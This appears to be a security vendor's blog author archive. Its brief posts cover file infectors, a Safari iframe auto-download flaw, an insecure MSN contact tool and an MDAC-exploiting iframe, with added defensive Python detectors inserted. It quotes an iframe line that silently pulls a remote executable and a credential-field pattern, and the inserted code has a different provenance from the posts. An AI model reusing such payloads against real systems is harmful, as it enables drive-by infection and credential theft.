    TrendLabs Security Intelligence Blog

    Author Archive - Lordian Mosuela (Threats Analyst)




    This month I’ve seen file infectors/viruses evolve in the way they carry out system infection. The diagram below shows the development from the old malware file layout to its new structure:

    Old Infector Structure

    New Infector Structure

    Notice that, unlike the “old” malware structure where all malware routines are contained in a single complete module, the PE file is now split into three parts, with propagation and download routines added to the picture.

    This new infection routine starts with the “mother” file infector, which essentially contains the infection procedure. This part searches for executable files, where it then adds its code.

    The infected files, in turn, contain the malware’s download routine as well as an encrypted text file. When decrypted, the text file points to another URL from which the executable file (a split-off module of the mother file infector) is downloaded, thereby restarting the whole infection routine. The encrypted text is used so that the malware author can host a static site on which the data and source URL can be modified, particularly once the current link is already detected by an Internet security or anti-malware product.
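    The three-part layout described above has a signature that a defender can look for: the mother infector appends its code to existing executables and redirects the entry point into it. The following is an added example, not code from the original post or from Trend Micro, showing a header-level heuristic for that pattern: it parses a PE32 section table without any third-party library and flags an entry point that sits outside every section, in the last section of a multi-section image, or in a section that is both writable and executable. The sample images are constructed in the script with a hypothetical build_pe() helper (header and section table only, no real code) so the check runs offline.

```python
import struct

# Section characteristic flags from the PE specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def build_pe(sections, entry_rva):
    """Build a minimal PE32 header plus section table (constructed test data,
    not a real executable). sections: (name, virtual_address, virtual_size, flags)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", optional, 16, entry_rva)  # AddressOfEntryPoint
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), vsize, va, vsize, 0, 0, 0, 0, 0, flags)
        for name, va, vsize, flags in sections
    )
    return dos_header + b"PE\x00\x00" + file_header + bytes(optional) + table


def parse_pe(data):
    """Return (entry_point_rva, [section dicts]) from a PE32 image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, fh + 2)[0]
    size_opt = struct.unpack_from("<H", data, fh + 16)[0]
    opt = fh + 20
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        name, vsize, va, _, _, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + size_opt + i * 40)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "flags": flags})
    return entry, sections


def infection_indicators(data):
    """Heuristic findings suggesting appended/injected code; empty list if none."""
    entry, sections = parse_pe(data)
    owner = None
    for idx, s in enumerate(sections):
        if s["va"] <= entry < s["va"] + max(s["vsize"], 1):
            owner = idx
    if owner is None:
        return ["entry point outside every section"]
    s, findings = sections[owner], []
    if len(sections) > 1 and owner == len(sections) - 1:
        findings.append(f"entry point in last section '{s['name']}'")
    if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section '{s['name']}' is writable and executable")
    if not s["flags"] & IMAGE_SCN_CNT_CODE:
        findings.append(f"entry section '{s['name']}' is not flagged as code")
    return findings


# Constructed samples: a normal layout and one with a trailing W+X section
# that owns the entry point, as an appending file infector would leave behind.
CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CLEAN_SAMPLE = build_pe([(b".text", 0x1000, 0x2000, CODE),
                         (b".data", 0x3000, 0x1000, DATA)], entry_rva=0x1100)
INFECTED_SAMPLE = build_pe([(b".text", 0x1000, 0x2000, CODE),
                            (b".data", 0x3000, 0x1000, DATA),
                            (b".xyz", 0x4000, 0x800, CODE | IMAGE_SCN_MEM_WRITE)],
                           entry_rva=0x4010)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(label, infection_indicators(sample) or ["no indicators"])
```

    These indicators are not proof of infection on their own (packers and some linkers produce similar layouts), which is why a scanner uses them as a trigger for closer inspection rather than as a verdict.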

    An example of malware using such a method is PE_LIJI.A-O (the mother file infector). Its infected files are detected as PE_LIJI.A, which, in turn, downloads malicious files detected as WORM_DROM.AI.

    In addition, WORM_DROM.AI performs routines that can disable anti-malware products. It displays an error message when such software is executed, as shown below:

    WORM_DROM.AI error message

    The LIJI-DROM tandem is yet another example of how threats are getting more complex (routine-wise, to avoid immediate detection), how they use the Web to further their malicious motives, and how “traditional” Internet security/Web blocking solutions are not enough.

    Fortunately for customers, the security industry is evolving along with these threats, with proactive and heuristic detection and, in Trend Micro’s case, Web Reputation Services. Otherwise, the cleanup for this type of file infection would take far more than three steps.

    Posted in Malware | Comments Off



    A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

    True enough, we have found that the Safari version 3.0.3 (522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example:

    <iframe src="http://www.XXXX.com/XXXX.exe" name="iframe" id="iframe"></iframe>

    Unlike IE and Firefox, which display an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any sort of notification.

    A behind-the-scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.

    The flaw is open to misuse: it allows files to be placed on a system without the user’s consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.

    Additional information provided by Leander Yu.

    Posted in Vulnerabilities | Comments Off



    We have received a number of cases today regarding the verification of the following New Zealand Web sites:

    • hxxp://www.msncheckstatus.tk
    • hxxp://www.real-msn.tk
    • hxxp://www.instant-messenger.tk
    • hxxp://www.msndelete-contacts.tk
    • hxxp://www.get-contacts-messenger.tk

    Once visited, these sites direct users to hxxp://www.get-messenger.com, the site for Get Messenger. It is a tool capable of logging into MSN Messenger® servers as a regular instant messaging (IM) client. It authenticates the user with his or her account name and password, retrieves the contact list, analyses it, and shows which contacts have removed the user from their lists.

    Screenshot of Get Messenger Web site

    The following is stated in the site’s FAQ page:

    Is Messenger-Tips a Worm?

    Definition: A computer worm is a self-replicating computer program. It uses a network to send copies of itself to other nodes (computer terminals on the network) and it may do so without any user intervention. Unlike a virus, it does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer.

    Messenger-Tips does not send copies of itself, it does not work without user intervention and it does not harm the network or any computer. Messenger-Tips is not a worm.

    Screenshot of Get Messenger Screen

    However, the method used to deliver the account credentials, such as the user’s name and password, during authentication is not secure. Using Follow TCP Stream, a feature of the Ethereal packet capture tool, we were able to capture an instance in which a user name and password are sent to the program’s server. Below is the image capture:

    Follow FTP Stream Capture

    This type of insecurity can easily expose a user�s account information to online identity thieves.
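    What Ethereal’s Follow TCP Stream does, in essence, is put the segments of one connection back in order and show the bytes as the application sent them; if a login goes over the wire without encryption, the credentials are simply there. The following is an added example, not code from the original post, that does the same thing on a constructed capture: a hypothetical reassemble() function orders client segments by sequence number (tolerating an out-of-order segment and a retransmitted duplicate), and find_cleartext_credentials() then reports credential fields found in the reassembled stream, masking password values so the report itself does not become a second leak. The login request, host name and field names are all made up for the demo.

```python
import re

# Constructed client-side payloads of a plaintext login, in send order.
_PAYLOADS = [
    b"POST /login HTTP/1.0\r\nHost: messenger.example.invalid\r\n",
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    b"user=alice%40example.com&pass=Hunter2!&action=check\r\n",
]


def _segmentize(payloads, isn=101):
    """Attach consecutive TCP sequence numbers to the payloads (constructed)."""
    segments, seq = [], isn
    for payload in payloads:
        segments.append((seq, payload))
        seq += len(payload)
    return segments


_ORDERED = _segmentize(_PAYLOADS)
# Deliver them as a sniffer might see them: out of order, with one retransmit.
CLIENT_SEGMENTS = [_ORDERED[2], _ORDERED[0], _ORDERED[1], _ORDERED[1]]


def reassemble(segments):
    """Rebuild one direction of a TCP stream from (seq, payload) pairs."""
    stream, expected = bytearray(), None
    for seq, payload in sorted(segments, key=lambda s: s[0]):
        if expected is None:
            expected = seq
        if seq + len(payload) <= expected:
            continue  # full duplicate (retransmission); nothing new
        if seq < expected:
            payload = payload[expected - seq:]  # partial overlap; keep the tail
            seq = expected
        if seq > expected:
            raise ValueError(f"gap in stream at seq {expected}")
        stream += payload
        expected = seq + len(payload)
    return bytes(stream)


# Form-field names commonly used for credentials (constructed list).
CRED_FIELDS = re.compile(rb"(?i)\b(user(?:name)?|login|email|pass(?:word|wd)?|pwd)=([^&\s]*)")


def _mask(value):
    return value[:1] + "*" * (len(value) - 1)


def find_cleartext_credentials(stream):
    """Return (field, value) pairs seen in the clear; secrets are masked."""
    findings = []
    for match in CRED_FIELDS.finditer(stream):
        field = match.group(1).decode("ascii").lower()
        value = match.group(2).decode("utf-8", "replace")
        if field.startswith("pass") or field == "pwd":
            value = _mask(value)
        findings.append((field, value))
    return findings


if __name__ == "__main__":
    stream = reassemble(CLIENT_SEGMENTS)
    print(stream.decode("utf-8", "replace"))
    for field, value in find_cleartext_credentials(stream):
        print(f"cleartext credential field: {field}={value}")
```

    The same check can be pointed at a real capture by feeding it the payloads of one TCP connection; the fact that the password is recoverable from the bytes alone is the whole finding, since anyone on the path can do the same.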

    Credits to Trend Threat Analyst Lordian Mosuela!

    Posted in Bad Sites | Comments Off



    After the Italian Job and the Russian Uprising, malware authors are now heading to the other side of the globe to spread “the love for malware”. A malicious IFRAME tag found in one of the files submitted by a customer contains the following:



    {File containing malicious IFRAME tag}



    The URL http://www.{BLOCKED}b.jp/index.htm contains a malicious JavaScript detected by Trend Micro as JS_AGENT.AAQI. The said JavaScript exploits the Microsoft Data Access Components vulnerability, discussed in Microsoft Security Bulletin MS06-014, to download and execute a file detected as TSPY_LINEAGE.ACZ.
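    Both the Safari post above and this one come down to an IFRAME tag whose source is something a page has no business embedding: an executable in one case, a third-party page carrying exploit script in the other. Below is an added example, not code from the original posts or from Trend Micro, of a small content check a proxy or crawler could apply: it parses HTML with the standard library and flags iframes whose src points at an executable, loads from a host other than the page’s own, or is sized or styled so the user cannot see it. The sample page and the .invalid host names are constructed; the page host passed in is assumed to be known from the URL being fetched.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi")

# Constructed sample page: one legitimate same-site frame and two that
# mirror the patterns described in the posts (executable src, hidden frame).
SAMPLE_PAGE = """
<html><body>
<h1>Welcome</h1>
<iframe src="/widgets/weather.html" width="300" height="200"></iframe>
<iframe src="http://www.example-bad.invalid/XXXX.exe" name="iframe" id="iframe"></iframe>
<iframe src="http://www.example-bad.invalid/index.htm" width="0" height="0"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _pixels(value):
    try:
        return int(value.strip().rstrip("px"))
    except ValueError:
        return None


def _is_hidden(attrs):
    width, height = _pixels(attrs.get("width", "")), _pixels(attrs.get("height", ""))
    if (width is not None and width <= 1) or (height is not None and height <= 1):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def suspicious_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that warrant a closer look."""
    collector = IframeCollector()
    collector.feed(html)
    results = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        parsed = urlparse(src)
        reasons = []
        if parsed.path.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("src points at an executable")
        if parsed.hostname and parsed.hostname.lower() != page_host.lower():
            reasons.append(f"loads from third-party host {parsed.hostname}")
        if _is_hidden(attrs):
            reasons.append("hidden frame (zero size or hidden style)")
        if reasons:
            results.append((src, reasons))
    return results


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE, "www.example.com"):
        print(src, "->", "; ".join(reasons))
```

    A third-party iframe is not malicious by itself (advertising and embedded widgets use them constantly), so in practice the host check is combined with a reputation lookup of the kind the post mentions; the executable and hidden-frame conditions, on the other hand, are rarely legitimate on an ordinary page.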



    The end result, the download and execution of spyware, suggests that malware authors may be timing this malicious move with the release of the online game Lineage II’s Saga 2: The Chaotic Throne in Southeast Asia. The online gaming community, which continues to grow in numbers, should be aware of this Japanese uprising.



    Trend Micro customers need not worry, as the aforementioned malware programs are detected and removed from affected systems. We also strongly recommend keeping software applications up-to-date by applying security patches released by vendors.

    Posted in Bad Sites | Comments Off


    Aug 17, 1:51 am (UTC-7)

    From using icons of popular applications to displaying windows and images to running normal applications (e.g., Notepad), malware has gone to great lengths to hide its routines from affected users. One of the latest trends in stealth mechanisms is best characterized by the ZLOB family of Trojans, known for posing as video codecs to lure unsuspecting users into downloading and executing them.

    Recently, TrendLabs detected WORM_SILLY.CQ, whose own twist in the malware game of hide-and-seek is that it installs Chinese Navigation 2.6.0.0 (aka Baidu Search Toolbar), the toolbar of China’s most popular Internet search engine. The Baidu Search Toolbar is usually seen in Internet Explorer’s standard button bar and address bar. Unfortunately, that’s not the only program WORM_SILLY.CQ installs, as it is designed to drop and download a slew of Trojans and spyware onto an affected system.

    Installing “normal” programs is not really a novel technique, but given the worm’s specific target via its choice of program to install (i.e., the Chinese computing population), it’s clear that the malware is banking on Baidu’s popularity in order to infect more users. On the other hand, the technique also spells bad news for the search engine maker because, unless otherwise intended, no software company really wants to be associated with malware, right? Users are thus encouraged to keep their pattern files updated in order to prevent infection by this worm (as well as its malicious components). Should they wish to remove the Chinese Navigation toolbar, it can simply be uninstalled via Add/Remove Programs.

    Posted in Bad Sites | Comments Off



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice